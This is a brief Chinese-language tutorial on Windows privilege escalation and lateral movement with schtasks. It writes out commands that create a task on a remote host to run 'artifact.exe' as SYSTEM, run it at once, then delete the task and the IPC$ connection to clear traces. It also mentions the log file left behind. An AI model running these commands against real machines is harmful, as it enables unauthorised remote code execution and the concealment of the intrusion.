windows提权

schtasks命令使用

schtasks命令比at命令更灵活。而且在Windows Vista、Windows Server 2008及之后版本的操作系统已经弃用at命令。
创建一个名称为"test"的计划任务，启动权限为system

schtasks /create /s 10.10.10.80 /tn test /sc onstart /tr c:\artifact.exe /ru system /f

在远程主机运行“test”任务

schtasks /run /s 10.10.10.80 /i /tn "test"

 

 执行完成之后就删除计划任务

schtasks /delete /s 10.10.10.80 /tn "test" /f

 

 接着删除IPC$

net use  \\10.10.10.80 /del /y

 

 在使用schtasks命令的时候会在系统留下日志文件C:WindowsTasksSchedLgU.txt。

 

参数的意思：

    /create 表示创建计划任务

    /tn  表示任务名

    /tr  指定运行的文件

    /sc  是任务运行频率

    /st  是执行时间

    /s  指定远程机器名或 ip 地址

    /ru 指定运行任务的用户权限，这里指定为最高的 SYSTEM

    /i  表示立即运行

    /F  表示如果指定的任务已经存在，则强制创建任务并抑制警告

    /delete  是删除任务。